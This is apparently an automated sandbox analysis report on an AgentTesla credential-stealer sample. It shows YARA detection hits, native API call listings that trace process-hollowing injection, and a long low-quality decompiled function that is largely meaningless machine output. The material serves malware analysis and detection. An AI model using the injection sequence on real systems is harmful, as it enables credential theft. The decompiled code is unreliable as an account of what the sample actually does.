                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Disassembly

                                              Code Analysis

                                                Executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167777694.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                                                Similarity
                                                • API ID: Section$OpenView
                                                • API String ID: 2380476227-789266925
                                                • Opcode ID: 787866d0769b518b38cf3cef9c8e0732aeba9ebab195fb7289df72886f22b9db
                                                • Instruction ID: 28cab4b3456d576ab00f501818cfba62ce7eb1f37bdf32ae341e191f5caa1cf3
                                                • Opcode Fuzzy Hash: 787866d0769b518b38cf3cef9c8e0732aeba9ebab195fb7289df72886f22b9db
                                                • Instruction Fuzzy Hash: 54D2BFB1C0526D8ACF22DFA58D85BDEBBB8BF15700F1041DAD248AB216DB319B84CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 003F1CB7
                                                • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 003F1CDC
                                                • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 003F1CF6
                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 003F1D41
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 003F1D66
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 003F1DA9
                                                • NtTerminateProcess.NTDLL(?,00000000), ref: 003F1DB7
                                                • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 003F1DC2
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 003F1E36
                                                • NtSetContextThread.NTDLL(?,00010007), ref: 003F1E74
                                                • NtResumeThread.NTDLL(?,00000000), ref: 003F1E86
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167777694.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                                                Similarity
                                                • API ID: Section$ProcessView$CreateMemoryThreadVirtual$ContextInformationQueryReadResumeTerminateUnmapWrite
                                                • String ID:
                                                • API String ID: 2175245719-0
                                                • Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                                • Instruction ID: d14af98d2cdac7e65d64eecc816d4a5868e1d7211ce2e024e019aa259f8ca77d
                                                • Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                                • Instruction Fuzzy Hash: 3491D07190024DEBDF219FA5DC89EEEBBB8FF49705F004059FA09EA150D731AA94DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtOpenSection.NTDLL(?,0000000C,?), ref: 003F0199
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 003F01B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167777694.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                                                Similarity
                                                • API ID: Section$OpenView
                                                • String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
                                                • API String ID: 2380476227-2634024955
                                                • Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                                • Instruction ID: 0c3c0a931b335c7ecc759fe18c519539e7f27bd4d4c74ca8ba05edb64cf1c5ae
                                                • Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                                • Instruction Fuzzy Hash: 153116B1D0025DABCB15CFD8C981AEEBBB8FF08750F10415AE614EB251E7749A05CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001B1300
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167698166.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: dd6b7ee67ad30d633716f630bb412282b27f60d9cd931425808471bb90e3ce2c
                                                • Instruction ID: f0ac134c360ad82e86b66d59c7d7d2722d940f35f4bbd0d00ac21800d0e2e9de
                                                • Opcode Fuzzy Hash: dd6b7ee67ad30d633716f630bb412282b27f60d9cd931425808471bb90e3ce2c
                                                • Instruction Fuzzy Hash: 4E81F4316002049FCB14DBB8C8547AFBBF6AF89314F558969D515DB392DB31DC46CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001B1300
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167698166.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167673653.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167673653.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167662351.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2167662351.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 17%
                                                			E0109F5C1(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
                                                				signed char _t308;
                                                				void* _t310;
                                                				signed int _t311;
                                                				signed int _t312;
                                                				signed int _t316;
                                                				signed int _t327;
                                                				intOrPtr* _t328;
                                                				signed int _t336;
                                                				signed int _t337;
                                                				signed int _t339;
                                                				signed char _t341;
                                                				signed int _t342;
                                                				signed int _t343;
                                                				signed char _t344;
                                                				signed int _t348;
                                                				signed int _t349;
                                                				void* _t352;
                                                				signed int _t353;
                                                				intOrPtr* _t354;
                                                				intOrPtr* _t355;
                                                				signed int _t356;
                                                				signed int _t357;
                                                				signed int _t359;
                                                				signed int _t360;
                                                				signed char _t361;
                                                				signed int _t362;
                                                				signed char _t363;
                                                				signed char _t365;
                                                				signed char _t366;
                                                				signed int _t367;
                                                				signed int* _t368;
                                                				signed int _t369;
                                                				signed char _t372;
                                                				signed char _t373;
                                                				signed char _t374;
                                                				signed char _t375;
                                                				signed char _t376;
                                                				signed char _t377;
                                                				signed char _t378;
                                                				signed char _t379;
                                                				signed int _t380;
                                                				signed int* _t381;
                                                				signed int _t382;
                                                				signed int _t384;
                                                				signed int _t385;
                                                				signed int _t386;
                                                				signed int _t387;
                                                				signed char _t390;
                                                				signed int _t391;
                                                				signed char _t392;
                                                				signed int _t393;
                                                				signed int _t394;
                                                				signed char _t397;
                                                				signed int _t398;
                                                				signed int _t399;
                                                				char* _t400;
                                                				void* _t401;
                                                				signed char _t402;
                                                				signed int _t404;
                                                				signed int _t406;
                                                				void* _t407;
                                                				signed int _t409;
                                                				signed int _t410;
                                                				signed int _t411;
                                                				intOrPtr* _t412;
                                                				intOrPtr* _t413;
                                                				void* _t414;
                                                				void* _t415;
                                                				signed int _t417;
                                                				intOrPtr* _t420;
                                                				signed int _t423;
                                                				signed int _t424;
                                                				void* _t425;
                                                				void* _t426;
                                                				void* _t428;
                                                				signed int* _t429;
                                                				intOrPtr* _t434;
                                                				intOrPtr* _t435;
                                                				void* _t436;
                                                				intOrPtr* _t438;
                                                				signed int _t441;
                                                				signed int _t443;
                                                				signed char _t445;
                                                				signed char _t447;
                                                				signed int _t448;
                                                				signed int _t449;
                                                				signed char _t450;
                                                				signed int _t451;
                                                				signed int _t453;
                                                				signed int* _t454;
                                                				signed int _t460;
                                                				signed int _t463;
                                                				signed int _t464;
                                                				signed int _t465;
                                                				signed int _t466;
                                                				void* _t467;
                                                				signed int _t469;
                                                				signed int _t470;
                                                
                                                				_t308 = __eax | 0xffffffff9fe00603;
                                                				asm("sbb ecx, [0xb8000102]");
                                                				_pop(ds);
                                                				asm("in al, dx");
                                                				asm("adc eax, [esi]");
                                                				 *((intOrPtr*)(__esi + 0x113ec1b)) =  *((intOrPtr*)(__esi + 0x113ec1b)) + __ecx;
                                                				 *__edx =  *__edx + _t308;
                                                				asm("adc eax, [esi]");
                                                				_t310 = (_t308 & __ecx) + (_t308 & __ecx);
                                                				asm("sbb ebp, esp");
                                                				asm("adc eax, [ecx]");
                                                				 *((intOrPtr*)(_t464 + 0x10eab1e)) =  *((intOrPtr*)(_t464 + 0x10eab1e)) + _t310;
                                                				 *((intOrPtr*)(_t464 + 0x101d91f)) =  *((intOrPtr*)(_t464 + 0x101d91f)) + __ecx;
                                                				_t409 = __ecx + __ecx;
                                                				_pop(ds);
                                                				asm("scasd");
                                                				 *_t409 =  *_t409 + _t310;
                                                				_t311 = _t310 + _t409;
                                                				_pop(ds);
                                                				asm("scasd");
                                                				 *_t409 =  *_t409 + _t311;
                                                				_pop(ds);
                                                				asm("scasd");
                                                				 *_t409 =  *_t409 + _t311;
                                                				 *((intOrPtr*)(__esi + 0x16)) =  *((intOrPtr*)(__esi + 0x16)) + _t311;
                                                				_t312 = _t311 | 0x17000102;
                                                				_pop(ss);
                                                				asm("scasd");
                                                				 *_t409 =  *_t409 + _t312;
                                                				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t409;
                                                				asm("out 0x2c, eax");
                                                				asm("scasd");
                                                				 *__esi =  *__esi + _t312;
                                                				 *((intOrPtr*)(__edx + 0x2f)) =  *((intOrPtr*)(__edx + 0x2f)) + _t409;
                                                				asm("scasd");
                                                				 *_t409 =  *_t409 + _t312;
                                                				_t397 = __ebx + __edx + _t409;
                                                				 *((intOrPtr*)(_t397 + 0x2f)) =  *((intOrPtr*)(_t397 + 0x2f)) + __edx;
                                                				_pop(ds);
                                                				_t316 = _t312 - 0x0000000d +  *__esi | 0x7f000702;
                                                				 *(_t316 + 0x1a) =  *(_t316 + 0x1a) ^ __edx;
                                                				 *[ss:eax+0xf] =  *[ss:eax+0xf] + _t316;
                                                				asm("pushad");
                                                				asm("sbb dl, [esi]");
                                                				 *((intOrPtr*)(_t316 + __esi + 0x65)) =  *((intOrPtr*)(_t316 + __esi + 0x65)) + _t316;
                                                				asm("sbb dl, [esi]");
                                                				 *((intOrPtr*)(__esi + 0x30)) =  *((intOrPtr*)(__esi + 0x30)) + _t409;
                                                				asm("outsb");
                                                				asm("sbb al, [esi]");
                                                				 *_t409 =  *_t409 + _t397;
                                                				asm("sbb al, 0x1f");
                                                				 *((intOrPtr*)(_t316 + 0x1c)) =  *((intOrPtr*)(_t316 + 0x1c)) + __edx;
                                                				 *(_t464 + 0x1a) =  *(_t464 + 0x1a) & _t397;
                                                				 *[ss:eax+0xf] =  *[ss:eax+0xf] + (_t316 | 0x3c000602);
                                                				 *__edi =  *__edi + __edx;
                                                				 *0x66000134 =  *0x66000134 & 0x0000001a;
                                                				ss = ss;
                                                				asm("scasd");
                                                				 *_t409 =  *_t409 + 0x1700011a;
                                                				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t409;
                                                				 *0xba000102 =  *0xba000102 ^ _t409;
                                                				 *_t409 =  *_t409 | __edx;
                                                				 *(__edi + 0x26000100) =  *(__edi + 0x26000100) ^ _t464;
                                                				_t470 = _t469 ^ __edi;
                                                				asm("sbb al, [ecx]");
                                                				 *0xFFFFFFFFFBFA0522 =  *((intOrPtr*)(0xfffffffffbfa0522)) + __edx;
                                                				 *_t409 =  *_t409 ^ 0xfffffffffbfa0522;
                                                				asm("sbb eax, [ecx]");
                                                				 *((intOrPtr*)(_t409 + __esi)) =  *((intOrPtr*)(_t409 + __esi)) + _t397;
                                                				 *0x66000102 =  *0x66000102 ^ _t409;
                                                				ss = ss;
                                                				_t423 = __edx &  *(__edi + 0x6200060d);
                                                				 *(__edi + 0x6b00010d) =  *(__edi + 0x6b00010d) ^ _t423;
                                                				 *(__edi + 0x76000109) =  *(__edi + 0x76000109) ^ __esi;
                                                				_t327 = 0xfffffffffffa0522 ^ __edi;
                                                				 *_t409 =  *_t409 + _t327;
                                                				_t328 = _t327 + _t397;
                                                				asm("clc");
                                                				 *_t409 =  *_t409 + _t328;
                                                				 *((intOrPtr*)(__edi + 0x1020d31)) =  *((intOrPtr*)(__edi + 0x1020d31)) + 0x2d;
                                                				 *((intOrPtr*)(__esi + 0x110fb31)) =  *((intOrPtr*)(__esi + 0x110fb31)) + _t409;
                                                				 *((intOrPtr*)(_t464 + 0x100af31)) =  *((intOrPtr*)(_t464 + 0x100af31)) + _t397;
                                                				 *((intOrPtr*)(__edi + 0x60d9731)) =  *((intOrPtr*)(__edi + 0x60d9731)) + _t328;
                                                				_t424 = _t423 + 0x2d;
                                                				_t465 = _t464 ^  *(__edi - 0x17ffea00);
                                                				ss = ss;
                                                				asm("sgdt [es:eax]");
                                                				 *(__edi + _t465 * 4) =  *(__edi + _t465 * 4) ^ 0x00000000;
                                                				 *_t328 =  *_t328 + _t328;
                                                				0xb500(ss, ss, es, ss);
                                                				 *_t409 =  *_t409 + 0x2d;
                                                				 *0xd =  *0xd + 0xd;
                                                				 *(__edi + _t424 * 4) =  *(__edi + _t424 * 4) << 1;
                                                				asm("scasd");
                                                				 *__esi =  *__esi + 0xd;
                                                				_push(es);
                                                				asm("salc");
                                                				asm("fidiv word [0x80561c9f]");
                                                				asm("out 0x35, al");
                                                				asm("lahf");
                                                				asm("sbb al, 0x56");
                                                				_t425 = _t424 - 0x35;
                                                				asm("lahf");
                                                				asm("sbb al, 0x1");
                                                				 *((intOrPtr*)(_t397 + 0x100af34)) =  *((intOrPtr*)(_t397 + 0x100af34)) + 0xd;
                                                				 *_t409 =  *_t409 + 0xd;
                                                				asm("scasd");
                                                				 *_t397 =  *_t397 + _t425;
                                                				 *((intOrPtr*)(_t397 - 0x37e318ca)) =  *((intOrPtr*)(_t397 - 0x37e318ca)) + __edi;
                                                				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 & 0x0000000d;
                                                				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 + 0xd;
                                                				 *((intOrPtr*)(__esi + 0x51218500)) =  *((intOrPtr*)(__esi + 0x51218500)) + _t425;
                                                				 *_t409 =  *_t409 + 0xd;
                                                				_t426 = _t425 + _t425;
                                                				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 & 0x0000000d;
                                                				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 + 0xd;
                                                				 *((intOrPtr*)(__esi + 0x6021b100)) =  *((intOrPtr*)(__esi + 0x6021b100)) + _t426;
                                                				 *_t397 =  *_t397 + 0xd;
                                                				_t398 = 0xffffffffb5d20200 + _t397;
                                                				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 & 0x0000000d;
                                                				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 + 0xd;
                                                				 *((intOrPtr*)(__esi + 0x6821c500)) =  *((intOrPtr*)(__esi + 0x6821c500)) + _t426;
                                                				 *0x20f400 =  *0x20f400 + 0xd;
                                                				 *0xFFFFFFFFB5D20200 =  *0xFFFFFFFFB5D20200 + 0xd;
                                                				 *((intOrPtr*)(__esi + 0x6e21e700)) =  *((intOrPtr*)(__esi + 0x6e21e700)) + _t426;
                                                				 *__esi =  *__esi + 0xd;
                                                				_t336 = 0xffffffffb5d20200 + _t398;
                                                				 *_t336 =  *_t336 & 0x0000000d;
                                                				 *_t336 =  *_t336 + 0xd;
                                                				 *((intOrPtr*)(_t398 + 0x76220300)) =  *((intOrPtr*)(_t398 + 0x76220300)) + _t426;
                                                				 *__esi =  *__esi + 0xd;
                                                				 *_t409 =  *_t409 + _t409;
                                                				 *_t336 =  *_t336 & _t336;
                                                				 *_t336 =  *_t336 + 0xd;
                                                				 *((intOrPtr*)(_t398 + 0x7b221200)) =  *((intOrPtr*)(_t398 + 0x7b221200)) + _t426;
                                                				 *__edi =  *__edi + 0xd;
                                                				 *_t398 =  *_t398 + _t398;
                                                				 *_t336 =  *_t336 & _t336;
                                                				 *_t336 =  *_t336 + 0xd;
                                                				 *((intOrPtr*)(_t398 + 0x7b221e00)) =  *((intOrPtr*)(_t398 + 0x7b221e00)) + _t426;
                                                				 *__edi =  *__edi + 0xd;
                                                				 *((intOrPtr*)(_t336 + 0x27)) =  *((intOrPtr*)(_t336 + 0x27)) + _t398;
                                                				 *((intOrPtr*)(__esi - 0x68ddc800)) =  *((intOrPtr*)(__esi - 0x68ddc800)) + _t426;
                                                				 *__edi =  *__edi + 0xd;
                                                				 *__esi =  *__esi + _t398;
                                                				 *_t336 =  *_t336 & _t336;
                                                				 *_t336 =  *_t336 + 0xd;
                                                				 *((intOrPtr*)(__esi - 0x6cf1dae8)) =  *((intOrPtr*)(__esi - 0x6cf1dae8)) + 0xd;
                                                				 *_t336 =  *_t336 + _t409;
                                                				 *__esi =  *__esi + _t336;
                                                				 *_t336 =  *_t336 & _t336;
                                                				 *_t336 =  *_t336 + 0xd;
                                                				 *((intOrPtr*)(_t409 + 0x6e224718)) =  *((intOrPtr*)(_t409 + 0x6e224718)) + _t426;
                                                				 *_t336 =  *_t336 + _t409;
                                                				 *((intOrPtr*)(_t465 + 0x21)) =  *((intOrPtr*)(_t465 + 0x21)) + _t426;
                                                				 *_t336 =  *_t336 + 0xd;
                                                				 *_t336 =  *_t336 + 0xd;
                                                				_t337 = _t398;
                                                				_t399 = _t336;
                                                				 *((intOrPtr*)(_t465 + 0x22)) =  *((intOrPtr*)(_t465 + 0x22)) + _t337;
                                                				asm("daa");
                                                				 *_t337 =  *_t337 + 0xd;
                                                				 *_t337 =  *_t337 + 0xd;
                                                				_t443 = _t337;
                                                				 *((intOrPtr*)(_t399 + 0x22)) =  *((intOrPtr*)(_t399 + 0x22)) + _t399;
                                                				asm("in al, 0x0");
                                                				_t339 = __esi |  *__esi;
                                                				 *((intOrPtr*)(_t443 - 0xadd7a00)) =  *((intOrPtr*)(_t443 - 0xadd7a00)) + 0xfc000800;
                                                				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
                                                				 *_t339 =  *_t339 & _t339;
                                                				 *_t339 =  *_t339 + 0xd;
                                                				 *((intOrPtr*)(_t409 + 0x6e229f00)) =  *((intOrPtr*)(_t409 + 0x6e229f00)) + 0xfc000800;
                                                				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
                                                				 *_t339 =  *_t339 & _t339;
                                                				 *_t339 =  *_t339 + 0xd;
                                                				 *((intOrPtr*)(_t443 + 0x6e22b200)) =  *((intOrPtr*)(_t443 + 0x6e22b200)) + 0xfc000800;
                                                				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
                                                				_t441 = 0x28;
                                                				 *_t339 =  *_t339 & _t339;
                                                				 *_t339 =  *_t339 + 0xd;
                                                				 *((intOrPtr*)(_t409 + 0x6e22e900)) =  *((intOrPtr*)(_t409 + 0x6e22e900)) + 0xfc000800;
                                                				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
                                                				_push(ds);
                                                				 *_t339 =  *_t339 & _t339;
                                                				 *_t339 =  *_t339 + 0xd;
                                                				 *((intOrPtr*)(_t443 - 0x6cf1dae8)) =  *((intOrPtr*)(_t443 - 0x6cf1dae8)) + 0xd;
                                                				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
                                                				asm("insd");
                                                				 *_t339 =  *_t339 & _t339;
                                                				 *_t339 =  *_t339 + 0xd;
                                                				 *((intOrPtr*)(_t409 + 0x6e224718)) =  *((intOrPtr*)(_t409 + 0x6e224718)) + 0xfc000800;
                                                				 *((intOrPtr*)(_t339 + _t339)) =  *((intOrPtr*)(_t339 + _t339)) + _t409;
                                                				 *_t339 = gs;
                                                				 *_t339 =  *_t339 + 0xd;
                                                				 *_t339 =  *_t339 + 0xd;
                                                				_t410 = _t409 + _t399;
                                                				_t341 = _t443 &  *_t441;
                                                				 *((intOrPtr*)(_t341 + _t341)) =  *((intOrPtr*)(_t341 + _t341)) + _t410;
                                                				asm("les ebp, [eax]");
                                                				 *_t341 =  *_t341 + 0xd;
                                                				 *_t341 =  *_t341 + 0xd;
                                                				_t342 = _t339;
                                                				_t445 = _t341;
                                                				 *_t342 =  *_t342 + 0xfc000800;
                                                				_t466 = _t465 &  *_t410;
                                                				 *0x294c00 =  *0x294c00 + _t410;
                                                				 *_t342 =  *_t342 + 0xd;
                                                				 *((intOrPtr*)(_t445 + 0x67234900)) =  *((intOrPtr*)(_t445 + 0x67234900)) + 0xfc000800;
                                                				 *_t445 =  *_t445 + _t410;
                                                				 *((intOrPtr*)(_t342 + 0x29)) =  *((intOrPtr*)(_t342 + 0x29)) + _t342;
                                                				 *((intOrPtr*)(_t445 - 0x6adc6a00)) =  *((intOrPtr*)(_t445 - 0x6adc6a00)) + 0xfc000800;
                                                				 *_t410 = 0xfc000800 +  *_t410;
                                                				 *_t342 =  *_t342 + _t342;
                                                				_t343 = _t342 -  *_t342;
                                                				 *_t343 =  *_t343 + 0xd;
                                                				 *((intOrPtr*)(_t445 + 0x2923b900)) =  *((intOrPtr*)(_t445 + 0x2923b900)) + 0xfc000800;
                                                				 *0xfc000800 = 0xfc000800 +  *0xfc000800;
                                                				 *((intOrPtr*)(0xfc000800 + _t466)) =  *((intOrPtr*)(0xfc000800 + _t466)) + _t410;
                                                				 *_t343 =  *_t343 + 0xd;
                                                				 *((intOrPtr*)(_t410 - 0x48dc1a00)) =  *((intOrPtr*)(_t410 - 0x48dc1a00)) + 0xfc000800;
                                                				 *_t399 =  *_t399 + 0xfc000800;
                                                				 *_t445 =  *_t445 + _t399;
                                                				 *_t343 =  *_t343 & _t343;
                                                				 *_t343 =  *_t343 + 0xd;
                                                				 *((intOrPtr*)(_t445 - 0x6cf1dae8)) =  *((intOrPtr*)(_t445 - 0x6cf1dae8)) + 0xd;
                                                				 *_t445 =  *_t445 + 0xfc000800;
                                                				 *((intOrPtr*)(0xfc000800 + _t466)) =  *((intOrPtr*)(0xfc000800 + _t466)) + _t343;
                                                				_t344 = _t445;
                                                				 *0x1202B824 =  *((intOrPtr*)(0x1202b824)) + 0xfc000800;
                                                				 *((intOrPtr*)(_t344 + 0x2b)) =  *((intOrPtr*)(_t344 + 0x2b)) + _t399;
                                                				 *_t344 =  *_t344 + 0xd;
                                                				 *_t344 =  *_t344 + 0xd;
                                                				_t447 = _t344;
                                                				 *((intOrPtr*)(_t399 + 0x10)) =  *((intOrPtr*)(_t399 + 0x10)) + _t410;
                                                				 *0xfc000800 =  *0xfc000800 + 1;
                                                				asm("sbb [eax], al");
                                                				L1();
                                                				 *((intOrPtr*)(_t447 + 0x52106b00)) =  *((intOrPtr*)(_t447 + 0x52106b00)) + 0xfc000800;
                                                				_t400 = _t399 +  *0xfc000800;
                                                				 *((intOrPtr*)(_t470 + _t466)) =  *((intOrPtr*)(_t470 + _t466)) + _t410;
                                                				_t448 = _t343;
                                                				 *((intOrPtr*)(_t400 + 0x10)) =  *((intOrPtr*)(_t400 + 0x10)) + _t410;
                                                				 *_t400 =  *_t400 + 0x1c;
                                                				_t348 = _t447 + _t447;
                                                				 *_t348 =  *_t348 + 0xd;
                                                				 *((intOrPtr*)(_t448 - 0x35db3600)) =  *((intOrPtr*)(_t448 - 0x35db3600)) + 0xfc000800;
                                                				_t401 = _t400 +  *0x2d7800;
                                                				 *_t348 =  *_t348 + 0xd;
                                                				 *((intOrPtr*)(_t448 + 0x40f8300)) =  *((intOrPtr*)(_t448 + 0x40f8300)) + 0xfc000800;
                                                				_t349 = _t448;
                                                				_t449 = _t348;
                                                				 *((intOrPtr*)(_t401 + 0x1f04040f)) =  *((intOrPtr*)(_t401 + 0x1f04040f)) + 0xd;
                                                				 *_t349 =  *_t349 + 0xd;
                                                				 *[cs:eax] =  *[cs:eax] + 0xd;
                                                				 *_t349 =  *_t349 + 0xd;
                                                				_t411 = _t349;
                                                				_t402 = _t401 + _t401;
                                                				_t352 = (_t410 & 0x00000049) + 0x20;
                                                				 *((intOrPtr*)(_t352 + 0x2e)) =  *((intOrPtr*)(_t352 + 0x2e)) + _t411;
                                                				 *((intOrPtr*)(_t411 - 0x37db0e00)) =  *((intOrPtr*)(_t411 - 0x37db0e00)) + 0xfc000800;
                                                				_t353 = _t352 + 0x22;
                                                				 *_t449 =  *_t449 + _t402;
                                                				 *_t353 =  *_t353 & _t353;
                                                				 *_t353 =  *_t353 + 0xd;
                                                				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
                                                				 *0x315000 =  *0x315000 + _t353;
                                                				 *_t353 =  *_t353 + 0xd;
                                                				 *((intOrPtr*)(_t402 - 0x66f07600)) =  *((intOrPtr*)(_t402 - 0x66f07600)) + 0xd;
                                                				_t354 = _t353 +  *0x211e00;
                                                				 *_t354 =  *_t354 + 0xd;
                                                				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
                                                				 *_t449 =  *_t449 + _t354;
                                                				 *((intOrPtr*)(_t411 + 0x21)) =  *((intOrPtr*)(_t411 + 0x21)) + _t402;
                                                				 *_t354 =  *_t354 + 0xd;
                                                				 *_t354 =  *_t354 + 0xd;
                                                				 *_t354 =  *_t354 + 0xffffff97;
                                                				asm("adc [esp+eax], bh");
                                                				 *[es:edi+0x21] =  *[es:edi+0x21] + 0xd;
                                                				 *((intOrPtr*)(_t402 + 0x1110ad00)) =  *((intOrPtr*)(_t402 + 0x1110ad00)) + 0xd;
                                                				_t355 = _t354 + 0x21aa0027;
                                                				 *_t355 =  *_t355 + 0xd;
                                                				 *_t355 =  *_t355 + 0xd;
                                                				_t356 = _t411;
                                                				_t412 = _t355;
                                                				asm("sbb [edi+0x22], al");
                                                				asm("outsb");
                                                				 *_t356 =  *_t356 + _t412;
                                                				 *_t449 =  *_t449 + _t402;
                                                				 *_t356 =  *_t356 & _t356;
                                                				 *_t356 =  *_t356 + 0xd;
                                                				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
                                                				 *_t356 =  *_t356 + _t412;
                                                				 *((intOrPtr*)(_t449 + 0x21)) =  *((intOrPtr*)(_t449 + 0x21)) + 0xfc000800;
                                                				 *((intOrPtr*)(_t402 + 0x4e0f6400)) =  *((intOrPtr*)(_t402 + 0x4e0f6400)) + 0xd;
                                                				_t413 = _t412 +  *_t356;
                                                				 *_t449 =  *_t449 + _t402;
                                                				 *_t356 =  *_t356 & _t356;
                                                				 *_t356 =  *_t356 + 0xd;
                                                				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
                                                				 *_t413 =  *_t413 + _t413;
                                                				 *((intOrPtr*)(_t356 + 0x32)) =  *((intOrPtr*)(_t356 + 0x32)) + _t413;
                                                				 *_t356 =  *_t356 + 0xd;
                                                				 *_t356 =  *_t356 + 0xd;
                                                				 *_t356 =  *_t356 + 0x5a;
                                                				_t357 = _t356 & 0x0029056a;
                                                				_push(ds);
                                                				 *_t357 =  *_t357 & _t357;
                                                				 *_t357 =  *_t357 + 0xd;
                                                				 *((intOrPtr*)(_t449 - 0x6cf1dae8)) =  *((intOrPtr*)(_t449 - 0x6cf1dae8)) + 0xd;
                                                				 *0xfc000800 =  *0xfc000800 + _t413;
                                                				 *((intOrPtr*)(_t449 + 0x21)) =  *((intOrPtr*)(_t449 + 0x21)) + _t402;
                                                				 *((intOrPtr*)(_t402 + 0x3c257e00)) =  *((intOrPtr*)(_t402 + 0x3c257e00)) + 0xd;
                                                				_t359 = _t357 + 0xfffffffffc00082a;
                                                				 *_t359 =  *_t359 & _t359;
                                                				 *_t359 =  *_t359 + 0xd;
                                                				 *((intOrPtr*)(_t402 - 0x66da7300)) =  *((intOrPtr*)(_t402 - 0x66da7300)) + 0xd;
